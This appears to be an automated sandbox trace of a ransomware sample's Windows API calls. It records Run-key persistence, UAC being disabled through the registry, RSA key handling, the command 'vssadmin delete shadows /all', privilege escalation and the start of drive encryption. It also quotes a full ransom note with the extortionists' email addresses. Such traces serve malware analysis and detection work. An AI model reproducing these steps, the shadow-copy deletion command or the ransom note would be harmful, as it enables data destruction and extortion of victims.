# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jun 6 2019 12:21:16 # Log Creation Date: 19.06.2019 16:00:01.785 Process: id = "1" image_name = "c_932.nls.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c_932.nls.exe" page_root = "0x4efbb000" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x9c4 [0029.867] CryptAcquireContextA (in: phProv=0x18ff80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ff80*=0x5947c8) returned 1 [0030.041] CryptImportKey (in: hProv=0x5947c8, pbData=0x401037, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x18ff7c | out: phKey=0x18ff7c*=0x5948e0) returned 1 [0030.043] CryptDecrypt (in: hKey=0x5948e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x403000, pdwDataLen=0x18ff84 | out: pbData=0x403000, pdwDataLen=0x18ff84) returned 1 [0030.045] CryptDestroyKey (hKey=0x5948e0) returned 1 [0030.045] CryptReleaseContext (hProv=0x5947c8, dwFlags=0x0) returned 1 [0030.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401d41, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x80 [0030.046] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x595038, nSize=0x8000 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c_932.nls.exe")) returned 0x33 [0030.046] lstrcmpiA (lpString1="C:\\windows\\searchfiles.exe", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe") returned 1 [0030.049] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", ulOptions=0x0, samDesired=0xf013f, phkResult=0x18ff6c | out: phkResult=0x18ff6c*=0x84) returned 0x0 [0030.049] lstrlenA (lpString="\"c:\\Decoding help.hta\"") returned 22 [0030.049] RegSetValueExA (in: hKey=0x84, lpValueName="unlock", Reserved=0x0, dwType=0x1, lpData="\"c:\\Decoding help.hta\"", cbData=0x16 | out: lpData="\"c:\\Decoding help.hta\"") returned 0x0 [0030.050] lstrlenA (lpString="C:\\windows\\searchfiles.exe") returned 26 [0030.050] RegSetValueExA (in: hKey=0x84, lpValueName="searchfiles", Reserved=0x0, dwType=0x1, lpData="C:\\windows\\searchfiles.exe", cbData=0x1a | out: lpData="C:\\windows\\searchfiles.exe") returned 0x0 [0030.050] RegCloseKey (hKey=0x84) returned 0x0 [0030.050] CopyFileA (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C_932.NLS.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c_932.nls.exe"), lpNewFileName="C:\\windows\\searchfiles.exe" (normalized: "c:\\windows\\searchfiles.exe"), bFailIfExists=0) returned 1 [0030.056] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DateTime\\", ulOptions=0x0, samDesired=0xf013f, phkResult=0x18ff6c | out: phkResult=0x18ff6c*=0x8c) returned 0x0 [0030.056] RegQueryValueExA (in: hKey=0x8c, lpValueName="orsa", lpReserved=0x0, lpType=0x0, lpData=0x4045f0, lpcbData=0x18ff5c*=0x114 | out: lpType=0x0, lpData=0x4045f0*=0x0, lpcbData=0x18ff5c*=0x114) returned 0x2 [0030.056] CryptAcquireContextA (in: phProv=0x18ff64, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ff64*=0x594688) returned 1 [0030.057] CryptGenKey (in: hProv=0x594688, Algid=0x1, dwFlags=0x8000001, phKey=0x18ff70 | out: phKey=0x18ff70*=0x5947e8) returned 1 [0032.597] CryptExportKey (in: hKey=0x5947e8, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x595038, pdwDataLen=0x18ff60 | out: pbData=0x595038*, pdwDataLen=0x18ff60*=0x494) returned 1 [0032.597] CryptExportKey (in: hKey=0x5947e8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4045f0, pdwDataLen=0x18ff60 | out: pbData=0x4045f0*, pdwDataLen=0x18ff60*=0x114) returned 1 [0032.598] CryptDestroyKey (hKey=0x5947e8) returned 1 [0032.598] CryptReleaseContext (hProv=0x594688, dwFlags=0x0) returned 1 [0032.598] CryptAcquireContextA (in: phProv=0x18ff64, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ff64*=0x5a2bd0) returned 1 [0032.599] CryptImportKey (in: hProv=0x5a2bd0, pbData=0x403fd0, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x403ab2 | out: phKey=0x403ab2*=0x5a5130) returned 1 [0032.599] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4040f0*, pdwDataLen=0x18ff60*=0xf4, dwBufLen=0x500 | out: pbData=0x4040f0*, pdwDataLen=0x18ff60*=0x100) returned 1 [0032.599] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4041f0*, pdwDataLen=0x18ff60*=0xf4, dwBufLen=0x500 | out: pbData=0x4041f0*, pdwDataLen=0x18ff60*=0x100) returned 1 [0032.599] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4042f0*, pdwDataLen=0x18ff60*=0xf4, dwBufLen=0x500 | out: pbData=0x4042f0*, pdwDataLen=0x18ff60*=0x100) returned 1 [0032.599] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4043f0*, pdwDataLen=0x18ff60*=0xf4, dwBufLen=0x500 | out: pbData=0x4043f0*, pdwDataLen=0x18ff60*=0x100) returned 1 [0032.599] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4044f0*, pdwDataLen=0x18ff60*=0xc4, dwBufLen=0x500 | out: pbData=0x4044f0*, pdwDataLen=0x18ff60*=0x100) returned 1 [0032.600] CryptDestroyKey (hKey=0x5a5130) returned 1 [0032.600] CryptReleaseContext (hProv=0x5a2bd0, dwFlags=0x0) returned 1 [0032.600] RegSetValueExA (in: hKey=0x8c, lpValueName="orsa", Reserved=0x0, dwType=0x3, lpData=0x4045f0*, cbData=0x114 | out: lpData=0x4045f0*) returned 0x0 [0032.601] RegSetValueExA (in: hKey=0x8c, lpValueName="rsa", Reserved=0x0, dwType=0x3, lpData=0x4040f0*, cbData=0x500 | out: lpData=0x4040f0*) returned 0x0 [0032.601] RegCloseKey (hKey=0x8c) returned 0x0 [0032.602] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", ulOptions=0x0, samDesired=0xf013f, phkResult=0x18ff6c | out: phkResult=0x18ff6c*=0x8c) returned 0x0 [0032.602] RegSetValueExA (in: hKey=0x8c, lpValueName="PromptOnSecureDesktop", Reserved=0x0, dwType=0x4, lpData=0x595038*=0x0, cbData=0x4 | out: lpData=0x595038*=0x0) returned 0x0 [0032.605] RegSetValueExA (in: hKey=0x8c, lpValueName="EnableLUA", Reserved=0x0, dwType=0x4, lpData=0x595038*=0x0, cbData=0x4 | out: lpData=0x595038*=0x0) returned 0x0 [0032.606] RegSetValueExA (in: hKey=0x8c, lpValueName="ConsentPromptBehaviorAdmin", Reserved=0x0, dwType=0x4, lpData=0x595038*=0x0, cbData=0x4 | out: lpData=0x595038*=0x0) returned 0x0 [0032.607] RegCloseKey (hKey=0x8c) returned 0x0 [0032.607] CryptAcquireContextA (in: phProv=0x18ff64, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18ff64*=0x5a2bd0) returned 1 [0032.608] CryptImportKey (in: hProv=0x5a2bd0, pbData=0x4045f0, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x403ab2 | out: phKey=0x403ab2*=0x5a5130) returned 1 [0032.608] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff74 | out: lpSystemTimeAsFileTime=0x18ff74*(dwLowDateTime=0x1f0c2810, dwHighDateTime=0x1d526b8)) [0032.608] FileTimeToSystemTime (in: lpFileTime=0x18ff74, lpSystemTime=0x18ff7c | out: lpSystemTime=0x18ff7c) returned 1 [0032.608] GetDateFormatA (in: Locale=0x0, dwFlags=0x0, lpDate=0x18ff7c, lpFormat="dd,MM,yyyy", lpDateStr=0x403449, cchDate=10 | out: lpDateStr="22,06,2019);


You are unlucky! The terrible virus has captured your files! For decoding please contact by email ZiCoyote@protonmail.com or ZiCoyote@aol.com



Your

[ID]g9uZrLhJaygpwRm1[ID]


1. In the subject line, write your ID.
2. Attach 1-2 infected files that do not contain important information (less than 2 mb)
are required to generate the decoder and restore the test file.
Hurry up! Time is limited!
Attention!!!
At the end of this time, the private key for generating the decoder will be destroyed. Files will not be restored!

") returned 0 [0032.608] lstrlenA (lpString="\r\n


You are unlucky! The terrible virus has captured your files! For decoding please contact by email ZiCoyote@protonmail.com or ZiCoyote@aol.com



Your

[ID]g9uZrLhJaygpwRm1[ID]


1. In the subject line, write your ID.
2. Attach 1-2 infected files that do not contain important information (less than 2 mb)
are required to generate the decoder and restore the test file.
Hurry up! Time is limited!
Attention!!!
At the end of this time, the private key for generating the decoder will be destroyed. Files will not be restored!

") returned 1934 [0032.608] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4035a7, cbMultiByte=-1, lpWideCharStr=0x404704, cchWideChar=25 | out: lpWideCharStr=" [ID]g9uZrLhJaygpwRm1[ID]") returned 0 [0032.608] lstrcatA (in: lpString1=".[ID]g9uZrLhJaygpwRm1[ID]", lpString2="\\shell\\open\\command" | out: lpString1=".[ID]g9uZrLhJaygpwRm1[ID]\\shell\\open\\command") returned=".[ID]g9uZrLhJaygpwRm1[ID]\\shell\\open\\command" [0032.608] RegCreateKeyA (in: hKey=0x80000000, lpSubKey=".[ID]g9uZrLhJaygpwRm1[ID]\\shell\\open\\command", phkResult=0x18ff6c | out: phkResult=0x18ff6c*=0xde) returned 0x0 [0032.615] lstrcatA (in: lpString1="", lpString2="C:\\Windows\\System32\\mshta.exe " | out: lpString1="C:\\Windows\\System32\\mshta.exe ") returned="C:\\Windows\\System32\\mshta.exe " [0032.615] lstrcatA (in: lpString1="C:\\Windows\\System32\\mshta.exe ", lpString2="\"c:\\Decoding help.hta\"" | out: lpString1="C:\\Windows\\System32\\mshta.exe \"c:\\Decoding help.hta\"") returned="C:\\Windows\\System32\\mshta.exe \"c:\\Decoding help.hta\"" [0032.615] lstrlenA (lpString="C:\\Windows\\System32\\mshta.exe \"c:\\Decoding help.hta\"") returned 52 [0032.615] RegSetValueExA (in: hKey=0xde, lpValueName="", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\System32\\mshta.exe \"c:\\Decoding help.hta\"", cbData=0x34 | out: lpData="C:\\Windows\\System32\\mshta.exe \"c:\\Decoding help.hta\"") returned 0x0 [0032.615] RegCloseKey (hKey=0xde) returned 0x0 [0032.615] SHChangeNotify (wEventId=134217728, uFlags=0x0, dwItem1=0x0, dwItem2=0x0) [0033.887] GetEnvironmentVariableA (in: lpName="ComSpec", lpBuffer=0x595038, nSize=0x5dc | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0033.888] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\system32\\cmd.exe", lpParameters="/c vssadmin delete shadows /all", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0037.363] SetErrorMode (uMode=0x1) returned 0x0 [0037.363] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x18ff40 | out: TokenHandle=0x18ff40*=0x1f4) returned 1 [0037.363] LookupPrivilegeValueA (in: lpSystemName=0x0, lpName="SeBackupPrivilege", lpLuid=0x18ff34 | out: lpLuid=0x18ff34*(LowPart=0x11, HighPart=0)) returned 1 [0037.364] AdjustTokenPrivileges (in: TokenHandle=0x1f4, DisableAllPrivileges=0, NewState=0x18ff30*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0037.364] CloseHandle (hObject=0x1f4) returned 1 [0037.364] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x18ff40 | out: TokenHandle=0x18ff40*=0x1f4) returned 1 [0037.364] LookupPrivilegeValueA (in: lpSystemName=0x0, lpName="SeRestorePrivilege", lpLuid=0x18ff34 | out: lpLuid=0x18ff34*(LowPart=0x12, HighPart=0)) returned 1 [0037.365] AdjustTokenPrivileges (in: TokenHandle=0x1f4, DisableAllPrivileges=0, NewState=0x18ff30*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0037.365] CloseHandle (hObject=0x1f4) returned 1 [0037.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401131, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1f4 [0037.366] CloseHandle (hObject=0x1f4) returned 1 [0037.366] GetLogicalDrives () returned 0x4 [0037.367] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0037.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0xffff, lpStartAddress=0x4014cc, lpParameter=0x5ebdc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1f4 [0037.369] CloseHandle (hObject=0x1f4) returned 1 [0037.369] Sleep (dwMilliseconds=0x7530) [0049.248] Sleep (dwMilliseconds=0x7530) [0060.630] Sleep (dwMilliseconds=0x7530) Thread: id = 2 os_tid = 0x9cc [0030.068] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x50fd48 | out: TokenHandle=0x50fd48*=0x84) returned 1 [0030.068] LookupPrivilegeValueA (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x50fd3c | out: lpLuid=0x50fd3c*(LowPart=0x14, HighPart=0)) returned 1 [0030.120] AdjustTokenPrivileges (in: TokenHandle=0x84, DisableAllPrivileges=0, NewState=0x50fd38*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0030.120] CloseHandle (hObject=0x84) returned 1 [0030.120] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x84 [0030.124] Process32FirstW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0030.124] lstrcmpiW (lpString1="[System Process]", lpString2="[System process]") returned 0 [0030.124] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0030.125] lstrcmpiW (lpString1="System", lpString2="[System process]") returned 1 [0030.125] lstrlenW (lpString="[System process]") returned 16 [0030.125] lstrcmpiW (lpString1="System", lpString2="System") returned 0 [0030.125] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0030.125] lstrcmpiW (lpString1="smss.exe", lpString2="[System process]") returned 1 [0030.125] lstrlenW (lpString="[System process]") returned 16 [0030.125] lstrcmpiW (lpString1="smss.exe", lpString2="System") returned -1 [0030.125] lstrlenW (lpString="System") returned 6 [0030.125] lstrcmpiW (lpString1="smss.exe", lpString2="smss.exe") returned 0 [0030.125] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.126] lstrcmpiW (lpString1="csrss.exe", lpString2="[System process]") returned 1 [0030.126] lstrlenW (lpString="[System process]") returned 16 [0030.126] lstrcmpiW (lpString1="csrss.exe", lpString2="System") returned -1 [0030.126] lstrlenW (lpString="System") returned 6 [0030.126] lstrcmpiW (lpString1="csrss.exe", lpString2="smss.exe") returned -1 [0030.126] lstrlenW (lpString="smss.exe") returned 8 [0030.126] lstrcmpiW (lpString1="csrss.exe", lpString2="dllhost.exe") returned -1 [0030.126] lstrlenW (lpString="dllhost.exe") returned 11 [0030.126] lstrcmpiW (lpString1="csrss.exe", lpString2="svchost.exe") returned -1 [0030.126] lstrlenW (lpString="svchost.exe") returned 11 [0030.126] lstrcmpiW (lpString1="csrss.exe", lpString2="csrss.exe") returned 0 [0030.126] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="[System process]") returned 1 [0030.127] lstrlenW (lpString="[System process]") returned 16 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="System") returned 1 [0030.127] lstrlenW (lpString="System") returned 6 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="smss.exe") returned 1 [0030.127] lstrlenW (lpString="smss.exe") returned 8 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="dllhost.exe") returned 1 [0030.127] lstrlenW (lpString="dllhost.exe") returned 11 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="svchost.exe") returned 1 [0030.127] lstrlenW (lpString="svchost.exe") returned 11 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="csrss.exe") returned 1 [0030.127] lstrlenW (lpString="csrss.exe") returned 9 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="Microsoft.ActiveDirectory") returned 1 [0030.127] lstrlenW (lpString="Microsoft.ActiveDirectory") returned 25 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="WebServices.exe") returned 1 [0030.127] lstrlenW (lpString="WebServices.exe") returned 15 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="cmd.exe") returned 1 [0030.127] lstrlenW (lpString="cmd.exe") returned 7 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="mstsc.exe") returned 1 [0030.127] lstrlenW (lpString="mstsc.exe") returned 9 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="find.exe") returned 1 [0030.127] lstrlenW (lpString="find.exe") returned 8 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="conhost.exe") returned 1 [0030.127] lstrlenW (lpString="conhost.exe") returned 11 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="explorer.exe") returned 1 [0030.127] lstrlenW (lpString="explorer.exe") returned 12 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="ctfmon.exe") returned 1 [0030.127] lstrlenW (lpString="ctfmon.exe") returned 10 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="lsass.exe") returned 1 [0030.127] lstrlenW (lpString="lsass.exe") returned 9 [0030.127] lstrcmpiW (lpString1="wininit.exe", lpString2="services.exe") returned 1 [0030.128] lstrlenW (lpString="services.exe") returned 12 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="tasklist.exe") returned 1 [0030.128] lstrlenW (lpString="tasklist.exe") returned 12 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="winlogon.exe") returned -1 [0030.128] lstrlenW (lpString="winlogon.exe") returned 12 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="wmiprvse.exe") returned -1 [0030.128] lstrlenW (lpString="wmiprvse.exe") returned 12 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="msdts.exe") returned 1 [0030.128] lstrlenW (lpString="msdts.exe") returned 9 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="bfsvc.exe") returned 1 [0030.128] lstrlenW (lpString="bfsvc.exe") returned 9 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="AdapterTroubleshooter.exe") returned 1 [0030.128] lstrlenW (lpString="AdapterTroubleshooter.exe") returned 25 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="alg.exe") returned 1 [0030.128] lstrlenW (lpString="alg.exe") returned 7 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="dwm.exe") returned 1 [0030.128] lstrlenW (lpString="dwm.exe") returned 7 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="issch.exe") returned 1 [0030.128] lstrlenW (lpString="issch.exe") returned 9 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="rundll32.exe") returned 1 [0030.128] lstrlenW (lpString="rundll32.exe") returned 12 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="spoolsv.exe") returned 1 [0030.128] lstrlenW (lpString="spoolsv.exe") returned 11 [0030.128] lstrcmpiW (lpString1="wininit.exe", lpString2="wininit.exe") returned 0 [0030.128] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.129] lstrcmpiW (lpString1="csrss.exe", lpString2="[System process]") returned 1 [0030.129] lstrlenW (lpString="[System process]") returned 16 [0030.129] lstrcmpiW (lpString1="csrss.exe", lpString2="System") returned -1 [0030.129] lstrlenW (lpString="System") returned 6 [0030.129] lstrcmpiW (lpString1="csrss.exe", lpString2="smss.exe") returned -1 [0030.129] lstrlenW (lpString="smss.exe") returned 8 [0030.129] lstrcmpiW (lpString1="csrss.exe", lpString2="dllhost.exe") returned -1 [0030.129] lstrlenW (lpString="dllhost.exe") returned 11 [0030.129] lstrcmpiW (lpString1="csrss.exe", lpString2="svchost.exe") returned -1 [0030.129] lstrlenW (lpString="svchost.exe") returned 11 [0030.129] lstrcmpiW (lpString1="csrss.exe", lpString2="csrss.exe") returned 0 [0030.129] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0030.129] lstrcmpiW (lpString1="winlogon.exe", lpString2="[System process]") returned 1 [0030.129] lstrlenW (lpString="[System process]") returned 16 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="System") returned 1 [0030.130] lstrlenW (lpString="System") returned 6 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="smss.exe") returned 1 [0030.130] lstrlenW (lpString="smss.exe") returned 8 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="dllhost.exe") returned 1 [0030.130] lstrlenW (lpString="dllhost.exe") returned 11 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="svchost.exe") returned 1 [0030.130] lstrlenW (lpString="svchost.exe") returned 11 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="csrss.exe") returned 1 [0030.130] lstrlenW (lpString="csrss.exe") returned 9 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="Microsoft.ActiveDirectory") returned 1 [0030.130] lstrlenW (lpString="Microsoft.ActiveDirectory") returned 25 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="WebServices.exe") returned 1 [0030.130] lstrlenW (lpString="WebServices.exe") returned 15 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="cmd.exe") returned 1 [0030.130] lstrlenW (lpString="cmd.exe") returned 7 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="mstsc.exe") returned 1 [0030.130] lstrlenW (lpString="mstsc.exe") returned 9 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="find.exe") returned 1 [0030.130] lstrlenW (lpString="find.exe") returned 8 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="conhost.exe") returned 1 [0030.130] lstrlenW (lpString="conhost.exe") returned 11 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="explorer.exe") returned 1 [0030.130] lstrlenW (lpString="explorer.exe") returned 12 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="ctfmon.exe") returned 1 [0030.130] lstrlenW (lpString="ctfmon.exe") returned 10 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="lsass.exe") returned 1 [0030.130] lstrlenW (lpString="lsass.exe") returned 9 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="services.exe") returned 1 [0030.130] lstrlenW (lpString="services.exe") returned 12 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="tasklist.exe") returned 1 [0030.130] lstrlenW (lpString="tasklist.exe") returned 12 [0030.130] lstrcmpiW (lpString1="winlogon.exe", lpString2="winlogon.exe") returned 0 [0030.130] Process32NextW (in: hSnapshot=0x84, lppe=0x50fd5c | out: lppe=0x50fd5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="[System process]") returned 1 [0030.131] lstrlenW (lpString="[System process]") returned 16 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="System") returned -1 [0030.131] lstrlenW (lpString="System") returned 6 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="smss.exe") returned -1 [0030.131] lstrlenW (lpString="smss.exe") returned 8 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="dllhost.exe") returned 1 [0030.131] lstrlenW (lpString="dllhost.exe") returned 11 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="svchost.exe") returned -1 [0030.131] lstrlenW (lpString="svchost.exe") returned 11 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="csrss.exe") returned 1 [0030.131] lstrlenW (lpString="csrss.exe") returned 9 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="Microsoft.ActiveDirectory") returned 1 [0030.131] lstrlenW (lpString="Microsoft.ActiveDirectory") returned 25 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="WebServices.exe") returned -1 [0030.131] lstrlenW (lpString="WebServices.exe") returned 15 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="cmd.exe") returned 1 [0030.131] lstrlenW (lpString="cmd.exe") returned 7 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="mstsc.exe") returned 1 [0030.131] lstrlenW (lpString="mstsc.exe") returned 9 [0030.131] lstrcmpiW (lpString1="services.exe", lpString2="find.exe") returned 1 [0030.131] lstrlenW (lpString="find.exe") returned 8 [0030.132] lstrcmpiW (lpString1="services.exe", lpString2="conhost.exe") returned 1 [0030.132] lstrlenW (lpString="conhost.exe") returned 11 [0030.132] lstrcmpiW (lpString1="services.exe", lpString2="explorer.exe") returned 1 [0030.132] lstrlenW (lpString="explorer.exe") returned 12 [0030.132] 